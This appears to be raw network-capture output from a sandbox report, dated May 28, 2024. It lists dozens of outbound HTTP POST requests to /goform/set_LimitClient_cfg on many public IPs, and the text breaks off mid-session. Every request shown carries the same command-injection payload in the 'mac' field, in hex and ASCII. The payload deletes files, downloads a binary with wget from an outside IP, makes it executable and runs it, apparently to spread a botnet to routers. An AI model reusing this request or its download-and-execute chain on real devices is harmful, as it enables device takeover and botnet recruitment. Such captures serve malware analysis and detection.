                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2394192.168.2.234513850.221.72.1858080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.462883949 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2395192.168.2.234534452.223.252.1118080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.462897062 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2396192.168.2.235046480.1.59.318080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.462913990 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2397192.168.2.234522412.227.35.928080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.462948084 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2398192.168.2.233467653.33.171.1988080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.462954044 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2399192.168.2.2343818218.25.74.958080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.462964058 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2400192.168.2.2360686180.28.71.1558080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.462974072 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2401192.168.2.2359370146.179.45.1088080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.462989092 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2402192.168.2.234920432.148.113.2048080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.483268976 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2403192.168.2.2349420148.138.89.288080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.483319998 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2404192.168.2.2340922185.210.167.708080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.483371019 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2405192.168.2.234006497.196.156.2148080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.483395100 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2406192.168.2.233760642.11.164.2128080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.483426094 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2407192.168.2.2354762172.238.110.848080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.483433008 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2408192.168.2.23495368.183.2.1098080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.483445883 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2409192.168.2.2348318163.225.209.418080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.483470917 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2410192.168.2.2337950165.211.92.868080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.483489037 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2411192.168.2.2349772133.163.10.1098080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.483505011 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2412192.168.2.2360082212.160.36.1378080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.483527899 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2413192.168.2.233953070.198.252.228080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.483541965 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2414192.168.2.2357124145.201.250.2028080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.483561993 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2415192.168.2.2347202149.43.253.578080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.483561993 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2416192.168.2.2341360218.112.162.2388080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.483587980 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
